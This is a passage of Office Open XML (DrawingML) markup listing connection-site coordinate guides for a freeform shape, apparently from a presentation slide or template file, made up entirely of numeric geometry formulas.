              <a:gd name="connsiteX57" fmla="*/ 711771 w 1605470"/>
              <a:gd name="connsiteY57" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 721092 w 1605470"/>
              <a:gd name="connsiteY58" fmla="*/ 5108383 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 717045 w 1605470"/>
              <a:gd name="connsiteY59" fmla="*/ 5094705 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 718807 w 1605470"/>
              <a:gd name="connsiteY60" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 721538 w 1605470"/>
              <a:gd name="connsiteY61" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 718242 w 1605470"/>
              <a:gd name="connsiteY62" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 719796 w 1605470"/>
              <a:gd name="connsiteY63" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 726705 w 1605470"/>
              <a:gd name="connsiteY64" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 722561 w 1605470"/>
              <a:gd name="connsiteY65" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 724935 w 1605470"/>
              <a:gd name="connsiteY66" fmla="*/ 4821504 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 732118 w 1605470"/>
              <a:gd name="connsiteY67" fmla="*/ 4801535 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 739787 w 1605470"/>
              <a:gd name="connsiteY68" fmla="*/ 4797794 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 741081 w 1605470"/>
              <a:gd name="connsiteY69" fmla="*/ 4784526 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 742865 w 1605470"/>
              <a:gd name="connsiteY70" fmla="*/ 4781211 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 751652 w 1605470"/>
              <a:gd name="connsiteY71" fmla="*/ 4761984 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 747700 w 1605470"/>
              <a:gd name="connsiteY72" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 743180 w 1605470"/>
              <a:gd name="connsiteY73" fmla="*/ 4613201 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 738263 w 1605470"/>
              <a:gd name="connsiteY74" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 756542 w 1605470"/>
              <a:gd name="connsiteY75" fmla="*/ 4350346 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 715481 w 1605470"/>
              <a:gd name="connsiteY76" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 719554 w 1605470"/>
              <a:gd name="connsiteY77" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 704810 w 1605470"/>
              <a:gd name="connsiteY78" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 705959 w 1605470"/>
              <a:gd name="connsiteY79" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 704535 w 1605470"/>
              <a:gd name="connsiteY80" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 700443 w 1605470"/>
              <a:gd name="connsiteY81" fmla="*/ 4010511 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 698282 w 1605470"/>
              <a:gd name="connsiteY82" fmla="*/ 3998331 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 690830 w 1605470"/>
              <a:gd name="connsiteY83" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 692428 w 1605470"/>
              <a:gd name="connsiteY84" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 685850 w 1605470"/>
              <a:gd name="connsiteY85" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 687181 w 1605470"/>
              <a:gd name="connsiteY86" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 691535 w 1605470"/>
              <a:gd name="connsiteY87" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 696613 w 1605470"/>
              <a:gd name="connsiteY88" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 719207 w 1605470"/>
              <a:gd name="connsiteY89" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 718632 w 1605470"/>
              <a:gd name="connsiteY90" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 718939 w 1605470"/>
              <a:gd name="connsiteY91" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 718966 w 1605470"/>
              <a:gd name="connsiteY92" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 717581 w 1605470"/>
              <a:gd name="connsiteY93" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 716465 w 1605470"/>
              <a:gd name="connsiteY94" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 718198 w 1605470"/>
              <a:gd name="connsiteY95" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 721941 w 1605470"/>
              <a:gd name="connsiteY96" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 721407 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 730103 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 737449 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 736745 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 740188 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 747726 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 774383 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3381564 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 774870 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3375761 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 770510 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3361844 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 767933 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3356929 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 766158 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 766414 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3348763 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 764166 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3341588 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 486968 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 2182937 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 442619 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1910499 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 446785 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1903212 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY17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59710 w 1605470"/>
              <a:gd name="connsiteY41" fmla="*/ 5564796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613201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613201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584173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584173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8807 w 1605470"/>
              <a:gd name="connsiteY58" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 721538 w 1605470"/>
              <a:gd name="connsiteY59" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 718242 w 1605470"/>
              <a:gd name="connsiteY60" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 719796 w 1605470"/>
              <a:gd name="connsiteY61" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 726705 w 1605470"/>
              <a:gd name="connsiteY62" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 722561 w 1605470"/>
              <a:gd name="connsiteY63" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 724935 w 1605470"/>
              <a:gd name="connsiteY64" fmla="*/ 4821504 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 732118 w 1605470"/>
              <a:gd name="connsiteY65" fmla="*/ 4801535 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 739787 w 1605470"/>
              <a:gd name="connsiteY66" fmla="*/ 4797794 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 741081 w 1605470"/>
              <a:gd name="connsiteY67" fmla="*/ 4784526 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 742865 w 1605470"/>
              <a:gd name="connsiteY68" fmla="*/ 4781211 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 751652 w 1605470"/>
              <a:gd name="connsiteY69" fmla="*/ 4761984 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 747700 w 1605470"/>
              <a:gd name="connsiteY70" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 743180 w 1605470"/>
              <a:gd name="connsiteY71" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 738263 w 1605470"/>
              <a:gd name="connsiteY72" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 756542 w 1605470"/>
              <a:gd name="connsiteY73" fmla="*/ 4350346 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 715481 w 1605470"/>
              <a:gd name="connsiteY74" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 719554 w 1605470"/>
              <a:gd name="connsiteY75" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 704810 w 1605470"/>
              <a:gd name="connsiteY76" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 705959 w 1605470"/>
              <a:gd name="connsiteY77" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 704535 w 1605470"/>
              <a:gd name="connsiteY78" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 700443 w 1605470"/>
              <a:gd name="connsiteY79" fmla="*/ 4010511 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 698282 w 1605470"/>
              <a:gd name="connsiteY80" fmla="*/ 3998331 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 690830 w 1605470"/>
              <a:gd name="connsiteY81" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 692428 w 1605470"/>
              <a:gd name="connsiteY82" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 685850 w 1605470"/>
              <a:gd name="connsiteY83" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 687181 w 1605470"/>
              <a:gd name="connsiteY84" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 691535 w 1605470"/>
              <a:gd name="connsiteY85" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 696613 w 1605470"/>
              <a:gd name="connsiteY86" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 719207 w 1605470"/>
              <a:gd name="connsiteY87" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 718632 w 1605470"/>
              <a:gd name="connsiteY88" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 718939 w 1605470"/>
              <a:gd name="connsiteY89" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 718966 w 1605470"/>
              <a:gd name="connsiteY90" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 717581 w 1605470"/>
              <a:gd name="connsiteY91" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 716465 w 1605470"/>
              <a:gd name="connsiteY92" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 718198 w 1605470"/>
              <a:gd name="connsiteY93" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 721941 w 1605470"/>
              <a:gd name="connsiteY94" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 721407 w 1605470"/>
              <a:gd name="connsiteY95" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 730103 w 1605470"/>
              <a:gd name="connsiteY96" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 737449 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 736745 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 740188 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 747726 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 774383 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3381564 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 774870 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3375761 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 770510 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3361844 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 767933 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3356929 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 766158 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 766414 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3348763 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 764166 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3341588 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 486968 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 2182937 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 442619 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1910499 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 446785 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1903212 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 343980 w 1605470"/>
